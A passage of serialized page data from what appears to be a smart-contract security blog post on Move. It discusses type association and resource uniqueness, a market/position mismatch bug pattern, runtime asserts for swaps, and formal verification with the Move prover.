BurnCapability",{"type":25,"tag":216,"props":10975,"children":10976},{"style":6964},[10977],{"type":31,"value":9757},{"type":25,"tag":216,"props":10979,"children":10980},{"style":7375},[10981],{"type":31,"value":10286},{"type":25,"tag":216,"props":10983,"children":10984},{"style":6964},[10985],{"type":31,"value":9757},{"type":25,"tag":216,"props":10987,"children":10988},{"style":7375},[10989],{"type":31,"value":10854},{"type":25,"tag":216,"props":10991,"children":10992},{"style":6964},[10993],{"type":31,"value":10903},{"type":25,"tag":216,"props":10995,"children":10996},{"class":6922,"line":7557},[10997],{"type":25,"tag":216,"props":10998,"children":10999},{"emptyLinePlaceholder":16},[11000],{"type":31,"value":7642},{"type":25,"tag":216,"props":11002,"children":11003},{"class":6922,"line":7574},[11004],{"type":25,"tag":216,"props":11005,"children":11006},{"style":6927},[11007],{"type":31,"value":10548},{"type":25,"tag":216,"props":11009,"children":11010},{"class":6922,"line":7591},[11011],{"type":25,"tag":216,"props":11012,"children":11013},{"style":6964},[11014],{"type":31,"value":9823},{"type":25,"tag":38,"props":11016,"children":11017},{},[11018,11020,11025],{"type":31,"value":11019},"When creating a ",{"type":25,"tag":82,"props":11021,"children":11023},{"className":11022},[],[11024],{"type":31,"value":10755},{"type":31,"value":11026},", uniqueness is implicitly enforced by moving it into a hardcoded address.",{"type":25,"tag":206,"props":11028,"children":11030},{"className":6915,"code":11029,"language":6914,"meta":7,"style":7},"  public(friend) fun create\u003CCoin0>(\n      lp_store: &signer,\n      // ...\n  ) acquires Reserves {\n      lp::assert_is_lp_store(signer::address_of(lp_store));\n\n      // ...\n\n      move_to(lp_store, ReserveCoinContainer\u003CCoin0> {\n        // ...\n      });\n",[11031],{"type":25,"tag":82,"props":11032,"children":11033},{"__ignoreMap":7},[11034,11077,11103,11110,11131,11176,11183,11190,11197,11234,11241],{"type":25,"tag":216,"props":11035,"children":11036},{"class":6922,"line":6923},[11037,11042,11046,11051,11055,11060,11065,11069,11073],{"type":25,"tag":216,"props":11038,"children":11039},{"style":7047},[11040],{"type":31,"value":11041},"  public",{"type":25,"tag":216,"props":11043,"children":11044},{"style":6964},[11045],{"type":31,"value":1850},{"type":25,"tag":216,"props":11047,"children":11048},{"style":6947},[11049],{"type":31,"value":11050},"friend",{"type":25,"tag":216,"props":11052,"children":11053},{"style":6964},[11054],{"type":31,"value":7036},{"type":25,"tag":216,"props":11056,"children":11057},{"style":6947},[11058],{"type":31,"value":11059},"fun",{"type":25,"tag":216,"props":11061,"children":11062},{"style":6947},[11063],{"type":31,"value":11064}," create",{"type":25,"tag":216,"props":11066,"children":11067},{"style":6964},[11068],{"type":31,"value":9757},{"type":25,"tag":216,"props":11070,"children":11071},{"style":7375},[11072],{"type":31,"value":10854},{"type":25,"tag":216,"props":11074,"children":11075},{"style":6964},[11076],{"type":31,"value":10540},{"type":25,"tag":216,"props":11078,"children":11079},{"class":6922,"line":6769},[11080,11085,11089,11094,11099],{"type":25,"tag":216,"props":11081,"children":11082},{"style":6947},[11083],{"type":31,"value":11084},"      lp_store",{"type":25,"tag":216,"props":11086,"children":11087},{"style":6953},[11088],{"type":31,"value":1472},{"type":25,"tag":216,"props":11090,"children":11091},{"style":6953},[11092],{"type":31,"value":11093}," &",{"type":25,"tag":216,"props":11095,"children":11096},{"style":6947},[11097],{"type":31,"value":11098},"signer",{"type":25,"tag":216,"props":11100,"children":11101},{"style":6964},[11102],{"type":31,"value":7465},{"type":25,"tag":216,"props":11104,"children":11105},{"class":6922,"line":6778},[11106],{"type":25,"tag":216,"props":11107,"children":11108},{"style":6927},[11109],{"type":31,"value":10548},{"type":25,"tag":216,"props":11111,"children":11112},{"class":6922,"line":7005},[11113,11118,11122,11127],{"type":25,"tag":216,"props":11114,"children":11115},{"style":6964},[11116],{"type":31,"value":11117},"  ) ",{"type":25,"tag":216,"props":11119,"children":11120},{"style":6947},[11121],{"type":31,"value":10295},{"type":25,"tag":216,"props":11123,"children":11124},{"style":7375},[11125],{"type":31,"value":11126}," Reserves",{"type":25,"tag":216,"props":11128,"children":11129},{"style":6964},[11130],{"type":31,"value":7241},{"type":25,"tag":216,"props":11132,"children":11133},{"class":6922,"line":7110},[11134,11139,11143,11148,11153,11157,11162,11166,11171],{"type":25,"tag":216,"props":11135,"children":11136},{"style":6964},[11137],{"type":31,"value":11138},"      lp",{"type":25,"tag":216,"props":11140,"children":11141},{"style":6953},[11142],{"type":31,"value":7438},{"type":25,"tag":216,"props":11144,"children":11145},{"style":7047},[11146],{"type":31,"value":11147},"assert_is_lp_store",{"type":25,"tag":216,"props":11149,"children":11150},{"style":6964},[11151],{"type":31,"value":11152},"(signer",{"type":25,"tag":216,"props":11154,"children":11155},{"style":6953},[11156],{"type":31,"value":7438},{"type":25,"tag":216,"props":11158,"children":11159},{"style":7047},[11160],{"type":31,"value":11161},"address_of",{"type":25,"tag":216,"props":11163,"children":11164},{"style":6964},[11165],{"type":31,"value":1850},{"type":25,"tag":216,"props":11167,"children":11168},{"style":6947},[11169],{"type":31,"value":11170},"lp_store",{"type":25,"tag":216,"props":11172,"children":11173},{"style":6964},[11174],{"type":31,"value":11175},"));\n",{"type":25,"tag":216,"props":11177,"children":11178},{"class":6922,"line":7216},[11179],{"type":25,"tag":216,"props":11180,"children":11181},{"emptyLinePlaceholder":16},[11182],{"type":31,"value":7642},{"type":25,"tag":216,"props":11184,"children":11185},{"class":6922,"line":7244},[11186],{"type":25,"tag":216,"props":11187,"children":11188},{"style":6927},[11189],{"type":31,"value":10548},{"type":25,"tag":216,"props":11191,"children":11192},{"class":6922,"line":7257},[11193],{"type":25,"tag":216,"props":11194,"children":11195},{"emptyLinePlaceholder":16},[11196],{"type":31,"value":7642},{"type":25,"tag":216,"props":11198,"children":11199},{"class":6922,"line":7275},[11200,11205,11209,11213,11217,11221,11225,11229],{"type":25,"tag":216,"props":11201,"children":11202},{"style":7047},[11203],{"type":31,"value":11204},"      move_to",{"type":25,"tag":216,"props":11206,"children":11207},{"style":6964},[11208],{"type":31,"value":1850},{"type":25,"tag":216,"props":11210,"children":11211},{"style":6947},[11212],{"type":31,"value":11170},{"type":25,"tag":216,"props":11214,"children":11215},{"style":6964},[11216],{"type":31,"value":7026},{"type":25,"tag":216,"props":11218,"children":11219},{"style":7375},[11220],{"type":31,"value":10755},{"type":25,"tag":216,"props":11222,"children":11223},{"style":6964},[11224],{"type":31,"value":9757},{"type":25,"tag":216,"props":11226,"children":11227},{"style":7375},[11228],{"type":31,"value":10854},{"type":25,"tag":216,"props":11230,"children":11231},{"style":6964},[11232],{"type":31,"value":11233},"> {\n",{"type":25,"tag":216,"props":11235,"children":11236},{"class":6922,"line":7296},[11237],{"type":25,"tag":216,"props":11238,"children":11239},{"style":6927},[11240],{"type":31,"value":10126},{"type":25,"tag":216,"props":11242,"children":11243},{"class":6922,"line":7305},[11244],{"type":25,"tag":216,"props":11245,"children":11246},{"style":6964},[11247],{"type":31,"value":11248},"      });\n",{"type":25,"tag":38,"props":11250,"children":11251},{},[11252],{"type":31,"value":11253},"In both these instances, type association only works because we create exactly one instance per type.",{"type":25,"tag":38,"props":11255,"children":11256},{},[11257,11259,11265,11267,11273,11274,11279],{"type":31,"value":11258},"On the other hand, consider if you have a ",{"type":25,"tag":82,"props":11260,"children":11262},{"className":11261},[],[11263],{"type":31,"value":11264},"Position\u003CT>",{"type":31,"value":11266}," and a ",{"type":25,"tag":82,"props":11268,"children":11270},{"className":11269},[],[11271],{"type":31,"value":11272},"Market\u003CT>",{"type":31,"value":5593},{"type":25,"tag":82,"props":11275,"children":11277},{"className":11276},[],[11278],{"type":31,"value":177},{"type":31,"value":11280}," is the coin type.",{"type":25,"tag":206,"props":11282,"children":11284},{"className":6915,"code":11283,"language":6914,"meta":7,"style":7},"    struct Market\u003Cphantom T> {\n        reserves: Coin\u003CT>,\n        // ...\n    }\n\n    struct Position\u003Cphantom T> {\n        amount: u64,\n        // ...\n    }\n",[11285],{"type":25,"tag":82,"props":11286,"children":11287},{"__ignoreMap":7},[11288,11316,11344,11351,11358,11365,11393,11413,11420],{"type":25,"tag":216,"props":11289,"children":11290},{"class":6922,"line":6923},[11291,11295,11300,11304,11308,11312],{"type":25,"tag":216,"props":11292,"children":11293},{"style":6936},[11294],{"type":31,"value":10003},{"type":25,"tag":216,"props":11296,"children":11297},{"style":7375},[11298],{"type":31,"value":11299}," Market",{"type":25,"tag":216,"props":11301,"children":11302},{"style":6964},[11303],{"type":31,"value":9757},{"type":25,"tag":216,"props":11305,"children":11306},{"style":6947},[11307],{"type":31,"value":9762},{"type":25,"tag":216,"props":11309,"children":11310},{"style":7375},[11311],{"type":31,"value":9870},{"type":25,"tag":216,"props":11313,"children":11314},{"style":6964},[11315],{"type":31,"value":11233},{"type":25,"tag":216,"props":11317,"children":11318},{"class":6922,"line":6769},[11319,11324,11328,11332,11336,11340],{"type":25,"tag":216,"props":11320,"children":11321},{"style":6947},[11322],{"type":31,"value":11323},"        reserves",{"type":25,"tag":216,"props":11325,"children":11326},{"style":6953},[11327],{"type":31,"value":1472},{"type":25,"tag":216,"props":11329,"children":11330},{"style":7375},[11331],{"type":31,"value":9752},{"type":25,"tag":216,"props":11333,"children":11334},{"style":6964},[11335],{"type":31,"value":9757},{"type":25,"tag":216,"props":11337,"children":11338},{"style":7375},[11339],{"type":31,"value":177},{"type":25,"tag":216,"props":11341,"children":11342},{"style":6964},[11343],{"type":31,"value":10089},{"type":25,"tag":216,"props":11345,"children":11346},{"class":6922,"line":6778},[11347],{"type":25,"tag":216,"props":11348,"children":11349},{"style":6927},[11350],{"type":31,"value":10126},{"type":25,"tag":216,"props":11352,"children":11353},{"class":6922,"line":7005},[11354],{"type":25,"tag":216,"props":11355,"children":11356},{"style":6964},[11357],{"type":31,"value":7311},{"type":25,"tag":216,"props":11359,"children":11360},{"class":6922,"line":7110},[11361],{"type":25,"tag":216,"props":11362,"children":11363},{"emptyLinePlaceholder":16},[11364],{"type":31,"value":7642},{"type":25,"tag":216,"props":11366,"children":11367},{"class":6922,"line":7216},[11368,11372,11377,11381,11385,11389],{"type":25,"tag":216,"props":11369,"children":11370},{"style":6936},[11371],{"type":31,"value":10003},{"type":25,"tag":216,"props":11373,"children":11374},{"style":7375},[11375],{"type":31,"value":11376}," Position",{"type":25,"tag":216,"props":11378,"children":11379},{"style":6964},[11380],{"type":31,"value":9757},{"type":25,"tag":216,"props":11382,"children":11383},{"style":6947},[11384],{"type":31,"value":9762},{"type":25,"tag":216,"props":11386,"children":11387},{"style":7375},[11388],{"type":31,"value":9870},{"type":25,"tag":216,"props":11390,"children":11391},{"style":6964},[11392],{"type":31,"value":11233},{"type":25,"tag":216,"props":11394,"children":11395},{"class":6922,"line":7244},[11396,11401,11405,11409],{"type":25,"tag":216,"props":11397,"children":11398},{"style":6947},[11399],{"type":31,"value":11400},"        amount",{"type":25,"tag":216,"props":11402,"children":11403},{"style":6953},[11404],{"type":31,"value":1472},{"type":25,"tag":216,"props":11406,"children":11407},{"style":7375},[11408],{"type":31,"value":9811},{"type":25,"tag":216,"props":11410,"children":11411},{"style":6964},[11412],{"type":31,"value":7465},{"type":25,"tag":216,"props":11414,"children":11415},{"class":6922,"line":7257},[11416],{"type":25,"tag":216,"props":11417,"children":11418},{"style":6927},[11419],{"type":31,"value":10126},{"type":25,"tag":216,"props":11421,"children":11422},{"class":6922,"line":7275},[11423],{"type":25,"tag":216,"props":11424,"children":11425},{"style":6964},[11426],{"type":31,"value":7311},{"type":25,"tag":38,"props":11428,"children":11429},{},[11430,11432,11437,11439,11444],{"type":31,"value":11431},"If ",{"type":25,"tag":82,"props":11433,"children":11435},{"className":11434},[],[11436],{"type":31,"value":11272},{"type":31,"value":11438}," isn't a unique type -- or in other words if you're able to create more than one instance of a market per type ",{"type":25,"tag":82,"props":11440,"children":11442},{"className":11441},[],[11443],{"type":31,"value":177},{"type":31,"value":11445}," -- you might be able to pass in the incorrect market for a given position. This is a common vulnerability pattern on Solana.",{"type":25,"tag":38,"props":11447,"children":11448},{},[11449],{"type":31,"value":11450},"Dynamic iteration of types is also impossible (at least as currently designed by the Move VM) leading to massive headaches for developers. In these scenarios, we empirically observe developers defaulting back to type reflection APIs, complicating code unnecessarily. Security at the expense of usability comes at the expense of security.",{"type":25,"tag":206,"props":11452,"children":11454},{"className":6915,"code":11453,"language":6914,"meta":7,"style":7},"    /// Get the price of the token per lamport.\n    public fun get_price(type_info: TypeInfo): Decimal acquires Oracle {\n        let oracle = borrow_global_mut\u003COracle>(@oracle);\n        let price = table::borrow_mut_with_default\u003CTypeInfo, Decimal>(\n            &mut oracle.prices,\n            type_info,\n            decimal::one()\n        );\n        *price\n    }\n",[11455],{"type":25,"tag":82,"props":11456,"children":11457},{"__ignoreMap":7},[11458,11466,11528,11577,11629,11654,11666,11688,11696,11709],{"type":25,"tag":216,"props":11459,"children":11460},{"class":6922,"line":6923},[11461],{"type":25,"tag":216,"props":11462,"children":11463},{"style":6927},[11464],{"type":31,"value":11465},"    /// Get the price of the token per lamport.\n",{"type":25,"tag":216,"props":11467,"children":11468},{"class":6922,"line":6769},[11469,11474,11478,11483,11487,11492,11496,11501,11505,11509,11514,11519,11524],{"type":25,"tag":216,"props":11470,"children":11471},{"style":6947},[11472],{"type":31,"value":11473},"    public",{"type":25,"tag":216,"props":11475,"children":11476},{"style":6947},[11477],{"type":31,"value":10158},{"type":25,"tag":216,"props":11479,"children":11480},{"style":7047},[11481],{"type":31,"value":11482}," get_price",{"type":25,"tag":216,"props":11484,"children":11485},{"style":6964},[11486],{"type":31,"value":1850},{"type":25,"tag":216,"props":11488,"children":11489},{"style":6947},[11490],{"type":31,"value":11491},"type_info",{"type":25,"tag":216,"props":11493,"children":11494},{"style":6953},[11495],{"type":31,"value":1472},{"type":25,"tag":216,"props":11497,"children":11498},{"style":7375},[11499],{"type":31,"value":11500}," TypeInfo",{"type":25,"tag":216,"props":11502,"children":11503},{"style":6964},[11504],{"type":31,"value":1888},{"type":25,"tag":216,"props":11506,"children":11507},{"style":6953},[11508],{"type":31,"value":1472},{"type":25,"tag":216,"props":11510,"children":11511},{"style":7375},[11512],{"type":31,"value":11513}," Decimal",{"type":25,"tag":216,"props":11515,"children":11516},{"style":6947},[11517],{"type":31,"value":11518}," acquires",{"type":25,"tag":216,"props":11520,"children":11521},{"style":7375},[11522],{"type":31,"value":11523}," Oracle",{"type":25,"tag":216,"props":11525,"children":11526},{"style":6964},[11527],{"type":31,"value":7241},{"type":25,"tag":216,"props":11529,"children":11530},{"class":6922,"line":6778},[11531,11535,11540,11544,11549,11553,11558,11563,11568,11573],{"type":25,"tag":216,"props":11532,"children":11533},{"style":6936},[11534],{"type":31,"value":7011},{"type":25,"tag":216,"props":11536,"children":11537},{"style":6947},[11538],{"type":31,"value":11539}," oracle",{"type":25,"tag":216,"props":11541,"children":11542},{"style":6953},[11543],{"type":31,"value":6956},{"type":25,"tag":216,"props":11545,"children":11546},{"style":6947},[11547],{"type":31,"value":11548}," borrow_global_mut",{"type":25,"tag":216,"props":11550,"children":11551},{"style":6964},[11552],{"type":31,"value":9757},{"type":25,"tag":216,"props":11554,"children":11555},{"style":7375},[11556],{"type":31,"value":11557},"Oracle",{"type":25,"tag":216,"props":11559,"children":11560},{"style":6964},[11561],{"type":31,"value":11562},">(",{"type":25,"tag":216,"props":11564,"children":11565},{"style":6953},[11566],{"type":31,"value":11567},"@",{"type":25,"tag":216,"props":11569,"children":11570},{"style":6947},[11571],{"type":31,"value":11572},"oracle",{"type":25,"tag":216,"props":11574,"children":11575},{"style":6964},[11576],{"type":31,"value":7797},{"type":25,"tag":216,"props":11578,"children":11579},{"class":6922,"line":7005},[11580,11584,11589,11593,11598,11602,11607,11611,11616,11620,11625],{"type":25,"tag":216,"props":11581,"children":11582},{"style":6936},[11583],{"type":31,"value":7011},{"type":25,"tag":216,"props":11585,"children":11586},{"style":6947},[11587],{"type":31,"value":11588}," price",{"type":25,"tag":216,"props":11590,"children":11591},{"style":6953},[11592],{"type":31,"value":6956},{"type":25,"tag":216,"props":11594,"children":11595},{"style":6964},[11596],{"type":31,"value":11597}," table",{"type":25,"tag":216,"props":11599,"children":11600},{"style":6953},[11601],{"type":31,"value":7438},{"type":25,"tag":216,"props":11603,"children":11604},{"style":6947},[11605],{"type":31,"value":11606},"borrow_mut_with_default",{"type":25,"tag":216,"props":11608,"children":11609},{"style":6964},[11610],{"type":31,"value":9757},{"type":25,"tag":216,"props":11612,"children":11613},{"style":7375},[11614],{"type":31,"value":11615},"TypeInfo",{"type":25,"tag":216,"props":11617,"children":11618},{"style":6964},[11619],{"type":31,"value":7026},{"type":25,"tag":216,"props":11621,"children":11622},{"style":7375},[11623],{"type":31,"value":11624},"Decimal",{"type":25,"tag":216,"props":11626,"children":11627},{"style":6964},[11628],{"type":31,"value":10540},{"type":25,"tag":216,"props":11630,"children":11631},{"class":6922,"line":7110},[11632,11637,11641,11645,11649],{"type":25,"tag":216,"props":11633,"children":11634},{"style":6953},[11635],{"type":31,"value":11636},"            &",{"type":25,"tag":216,"props":11638,"children":11639},{"style":6936},[11640],{"type":31,"value":7691},{"type":25,"tag":216,"props":11642,"children":11643},{"style":6947},[11644],{"type":31,"value":11539},{"type":25,"tag":216,"props":11646,"children":11647},{"style":6953},[11648],{"type":31,"value":179},{"type":25,"tag":216,"props":11650,"children":11651},{"style":6964},[11652],{"type":31,"value":11653},"prices,\n",{"type":25,"tag":216,"props":11655,"children":11656},{"class":6922,"line":7216},[11657,11662],{"type":25,"tag":216,"props":11658,"children":11659},{"style":6947},[11660],{"type":31,"value":11661},"            type_info",{"type":25,"tag":216,"props":11663,"children":11664},{"style":6964},[11665],{"type":31,"value":7465},{"type":25,"tag":216,"props":11667,"children":11668},{"class":6922,"line":7244},[11669,11674,11678,11683],{"type":25,"tag":216,"props":11670,"children":11671},{"style":6964},[11672],{"type":31,"value":11673},"            decimal",{"type":25,"tag":216,"props":11675,"children":11676},{"style":6953},[11677],{"type":31,"value":7438},{"type":25,"tag":216,"props":11679,"children":11680},{"style":7047},[11681],{"type":31,"value":11682},"one",{"type":25,"tag":216,"props":11684,"children":11685},{"style":6964},[11686],{"type":31,"value":11687},"()\n",{"type":25,"tag":216,"props":11689,"children":11690},{"class":6922,"line":7257},[11691],{"type":25,"tag":216,"props":11692,"children":11693},{"style":6964},[11694],{"type":31,"value":11695},"        );\n",{"type":25,"tag":216,"props":11697,"children":11698},{"class":6922,"line":7275},[11699,11704],{"type":25,"tag":216,"props":11700,"children":11701},{"style":6953},[11702],{"type":31,"value":11703},"        *",{"type":25,"tag":216,"props":11705,"children":11706},{"style":6947},[11707],{"type":31,"value":11708},"price\n",{"type":25,"tag":216,"props":11710,"children":11711},{"class":6922,"line":7296},[11712],{"type":25,"tag":216,"props":11713,"children":11714},{"style":6964},[11715],{"type":31,"value":7311},{"type":25,"tag":38,"props":11717,"children":11718},{},[11719,11721,11726],{"type":31,"value":11720},"Type association feels like a proxy for the intended pattern -- associating resources with instances. It's very useful being able to store a reference to an ",{"type":25,"tag":64,"props":11722,"children":11723},{},[11724],{"type":31,"value":11725},"instance",{"type":31,"value":11727}," of another resource (which is possible in Diem style move).",{"type":25,"tag":38,"props":11729,"children":11730},{},[11731],{"type":31,"value":11732},"In summary, when using type systems to bind resources to each other, it's important to either",{"type":25,"tag":6711,"props":11734,"children":11735},{},[11736,11741],{"type":25,"tag":2043,"props":11737,"children":11738},{},[11739],{"type":31,"value":11740},"Have unique initializers for your resources",{"type":25,"tag":2043,"props":11742,"children":11743},{},[11744],{"type":31,"value":11745},"Associate resources with instances directly",{"type":25,"tag":26,"props":11747,"children":11749},{"id":11748},"formal-verification",[11750],{"type":31,"value":11751},"Formal Verification",{"type":25,"tag":38,"props":11753,"children":11754},{},[11755],{"type":31,"value":11756},"Formal verification is another exciting feature.",{"type":25,"tag":38,"props":11758,"children":11759},{},[11760],{"type":31,"value":11761},"As part of our work with protocols, we actively use formal verification to prove aspects of security.",{"type":25,"tag":38,"props":11763,"children":11764},{},[11765,11767,11772],{"type":31,"value":11766},"However, this isn't a silver bullet. The key is figuring out ",{"type":25,"tag":64,"props":11768,"children":11769},{},[11770],{"type":31,"value":11771},"what",{"type":31,"value":11773}," to prove.",{"type":25,"tag":38,"props":11775,"children":11776},{},[11777,11779,11786],{"type":31,"value":11778},"One obvious idea might be a properties across a particular function. For example, we might want to ensure that a swap doesn't reduce the value of the pool -- similar to the ",{"type":25,"tag":162,"props":11780,"children":11783},{"href":11781,"rel":11782},"https://osec.io/blog/reports/2022-04-26-spl-swap-rounding/",[166],[11784],{"type":31,"value":11785},"Solana AMM rounding issue",{"type":31,"value":11787}," we reported.",{"type":25,"tag":38,"props":11789,"children":11790},{},[11791],{"type":31,"value":11792},"However, this could also be checked with a simple runtime assert. For example, we recommended Pontem assert that liquidity pool token values are strictly increasing.",{"type":25,"tag":206,"props":11794,"children":11796},{"className":6915,"code":11795,"language":6914,"meta":7,"style":7},"  let cmp = u256::compare(&lp_value_after_swap_and_fee, &lp_value_before_swap_u256);\n  assert!(cmp == 2, ERR_INCORRECT_SWAP);\n",[11797],{"type":25,"tag":82,"props":11798,"children":11799},{"__ignoreMap":7},[11800,11861],{"type":25,"tag":216,"props":11801,"children":11802},{"class":6922,"line":6923},[11803,11808,11813,11817,11822,11826,11831,11835,11839,11844,11848,11852,11857],{"type":25,"tag":216,"props":11804,"children":11805},{"style":6936},[11806],{"type":31,"value":11807},"  let",{"type":25,"tag":216,"props":11809,"children":11810},{"style":6947},[11811],{"type":31,"value":11812}," cmp",{"type":25,"tag":216,"props":11814,"children":11815},{"style":6953},[11816],{"type":31,"value":6956},{"type":25,"tag":216,"props":11818,"children":11819},{"style":6964},[11820],{"type":31,"value":11821}," u256",{"type":25,"tag":216,"props":11823,"children":11824},{"style":6953},[11825],{"type":31,"value":7438},{"type":25,"tag":216,"props":11827,"children":11828},{"style":7047},[11829],{"type":31,"value":11830},"compare",{"type":25,"tag":216,"props":11832,"children":11833},{"style":6964},[11834],{"type":31,"value":1850},{"type":25,"tag":216,"props":11836,"children":11837},{"style":6953},[11838],{"type":31,"value":7059},{"type":25,"tag":216,"props":11840,"children":11841},{"style":6947},[11842],{"type":31,"value":11843},"lp_value_after_swap_and_fee",{"type":25,"tag":216,"props":11845,"children":11846},{"style":6964},[11847],{"type":31,"value":7026},{"type":25,"tag":216,"props":11849,"children":11850},{"style":6953},[11851],{"type":31,"value":7059},{"type":25,"tag":216,"props":11853,"children":11854},{"style":6947},[11855],{"type":31,"value":11856},"lp_value_before_swap_u256",{"type":25,"tag":216,"props":11858,"children":11859},{"style":6964},[11860],{"type":31,"value":7797},{"type":25,"tag":216,"props":11862,"children":11863},{"class":6922,"line":6769},[11864,11869,11873,11878,11882,11887],{"type":25,"tag":216,"props":11865,"children":11866},{"style":7047},[11867],{"type":31,"value":11868},"  assert!",{"type":25,"tag":216,"props":11870,"children":11871},{"style":6964},[11872],{"type":31,"value":1850},{"type":25,"tag":216,"props":11874,"children":11875},{"style":6947},[11876],{"type":31,"value":11877},"cmp",{"type":25,"tag":216,"props":11879,"children":11880},{"style":6953},[11881],{"type":31,"value":7232},{"type":25,"tag":216,"props":11883,"children":11884},{"style":6989},[11885],{"type":31,"value":11886}," 2",{"type":25,"tag":216,"props":11888,"children":11889},{"style":6964},[11890],{"type":31,"value":11891},", ERR_INCORRECT_SWAP);\n",{"type":25,"tag":38,"props":11893,"children":11894},{},[11895,11897,11902],{"type":31,"value":11896},"The move prover really shines when we're proving relationships ",{"type":25,"tag":64,"props":11898,"children":11899},{},[11900],{"type":31,"value":11901},"between",{"type":31,"value":11903}," functions.",{"type":25,"tag":38,"props":11905,"children":11906},{},[11907,11909,11915],{"type":31,"value":11908},"One example of a more complicated relationship that can't be proved easily via assertions would be the ",{"type":25,"tag":82,"props":11910,"children":11912},{"className":11911},[],[11913],{"type":31,"value":11914},"no_free_money_theorem",{"type":31,"value":11916}," in the move repository.",{"type":25,"tag":206,"props":11918,"children":11920},{"className":6915,"code":11919,"language":6914,"meta":7,"style":7},"  // #[test] // TODO: cannot specify the test-only functions\n  fun no_free_money_theorem(coin1_in: u64, coin2_in: u64): (u64, u64) acquires Pool {\n      let share = add_liquidity(coin1_in, coin2_in);\n      remove_liquidity(share)\n  }\n  spec no_free_money_theorem {\n      pragma verify=false;\n      ensures result_1 \u003C= coin1_in;\n      ensures result_2 \u003C= coin2_in;\n  }\n",[11921],{"type":25,"tag":82,"props":11922,"children":11923},{"__ignoreMap":7},[11924,11932,12020,12062,12083,12090,12106,12132,12159,12184],{"type":25,"tag":216,"props":11925,"children":11926},{"class":6922,"line":6923},[11927],{"type":25,"tag":216,"props":11928,"children":11929},{"style":6927},[11930],{"type":31,"value":11931},"  // #[test] // TODO: cannot specify the test-only functions\n",{"type":25,"tag":216,"props":11933,"children":11934},{"class":6922,"line":6769},[11935,11939,11944,11948,11953,11957,11961,11965,11970,11974,11978,11982,11986,11990,11995,11999,12003,12007,12011,12016],{"type":25,"tag":216,"props":11936,"children":11937},{"style":6947},[11938],{"type":31,"value":10521},{"type":25,"tag":216,"props":11940,"children":11941},{"style":7047},[11942],{"type":31,"value":11943}," no_free_money_theorem",{"type":25,"tag":216,"props":11945,"children":11946},{"style":6964},[11947],{"type":31,"value":1850},{"type":25,"tag":216,"props":11949,"children":11950},{"style":6947},[11951],{"type":31,"value":11952},"coin1_in",{"type":25,"tag":216,"props":11954,"children":11955},{"style":6953},[11956],{"type":31,"value":1472},{"type":25,"tag":216,"props":11958,"children":11959},{"style":7375},[11960],{"type":31,"value":9811},{"type":25,"tag":216,"props":11962,"children":11963},{"style":6964},[11964],{"type":31,"value":7026},{"type":25,"tag":216,"props":11966,"children":11967},{"style":6947},[11968],{"type":31,"value":11969},"coin2_in",{"type":25,"tag":216,"props":11971,"children":11972},{"style":6953},[11973],{"type":31,"value":1472},{"type":25,"tag":216,"props":11975,"children":11976},{"style":7375},[11977],{"type":31,"value":9811},{"type":25,"tag":216,"props":11979,"children":11980},{"style":6964},[11981],{"type":31,"value":1888},{"type":25,"tag":216,"props":11983,"children":11984},{"style":6953},[11985],{"type":31,"value":1472},{"type":25,"tag":216,"props":11987,"children":11988},{"style":6964},[11989],{"type":31,"value":7016},{"type":25,"tag":216,"props":11991,"children":11992},{"style":7375},[11993],{"type":31,"value":11994},"u64",{"type":25,"tag":216,"props":11996,"children":11997},{"style":6964},[11998],{"type":31,"value":7026},{"type":25,"tag":216,"props":12000,"children":12001},{"style":7375},[12002],{"type":31,"value":11994},{"type":25,"tag":216,"props":12004,"children":12005},{"style":6964},[12006],{"type":31,"value":7036},{"type":25,"tag":216,"props":12008,"children":12009},{"style":6947},[12010],{"type":31,"value":10295},{"type":25,"tag":216,"props":12012,"children":12013},{"style":7375},[12014],{"type":31,"value":12015}," Pool",{"type":25,"tag":216,"props":12017,"children":12018},{"style":6964},[12019],{"type":31,"value":7241},{"type":25,"tag":216,"props":12021,"children":12022},{"class":6922,"line":6778},[12023,12028,12033,12037,12042,12046,12050,12054,12058],{"type":25,"tag":216,"props":12024,"children":12025},{"style":6936},[12026],{"type":31,"value":12027},"      let",{"type":25,"tag":216,"props":12029,"children":12030},{"style":6947},[12031],{"type":31,"value":12032}," share",{"type":25,"tag":216,"props":12034,"children":12035},{"style":6953},[12036],{"type":31,"value":6956},{"type":25,"tag":216,"props":12038,"children":12039},{"style":7047},[12040],{"type":31,"value":12041}," add_liquidity",{"type":25,"tag":216,"props":12043,"children":12044},{"style":6964},[12045],{"type":31,"value":1850},{"type":25,"tag":216,"props":12047,"children":12048},{"style":6947},[12049],{"type":31,"value":11952},{"type":25,"tag":216,"props":12051,"children":12052},{"style":6964},[12053],{"type":31,"value":7026},{"type":25,"tag":216,"props":12055,"children":12056},{"style":6947},[12057],{"type":31,"value":11969},{"type":25,"tag":216,"props":12059,"children":12060},{"style":6964},[12061],{"type":31,"value":7797},{"type":25,"tag":216,"props":12063,"children":12064},{"class":6922,"line":7005},[12065,12070,12074,12079],{"type":25,"tag":216,"props":12066,"children":12067},{"style":7047},[12068],{"type":31,"value":12069},"      remove_liquidity",{"type":25,"tag":216,"props":12071,"children":12072},{"style":6964},[12073],{"type":31,"value":1850},{"type":25,"tag":216,"props":12075,"children":12076},{"style":6947},[12077],{"type":31,"value":12078},"share",{"type":25,"tag":216,"props":12080,"children":12081},{"style":6964},[12082],{"type":31,"value":7107},{"type":25,"tag":216,"props":12084,"children":12085},{"class":6922,"line":7110},[12086],{"type":25,"tag":216,"props":12087,"children":12088},{"style":6964},[12089],{"type":31,"value":9823},{"type":25,"tag":216,"props":12091,"children":12092},{"class":6922,"line":7216},[12093,12098,12102],{"type":25,"tag":216,"props":12094,"children":12095},{"style":6947},[12096],{"type":31,"value":12097},"  spec",{"type":25,"tag":216,"props":12099,"children":12100},{"style":6947},[12101],{"type":31,"value":11943},{"type":25,"tag":216,"props":12103,"children":12104},{"style":6964},[12105],{"type":31,"value":7241},{"type":25,"tag":216,"props":12107,"children":12108},{"class":6922,"line":7244},[12109,12114,12119,12123,12128],{"type":25,"tag":216,"props":12110,"children":12111},{"style":6947},[12112],{"type":31,"value":12113},"      pragma",{"type":25,"tag":216,"props":12115,"children":12116},{"style":6947},[12117],{"type":31,"value":12118}," 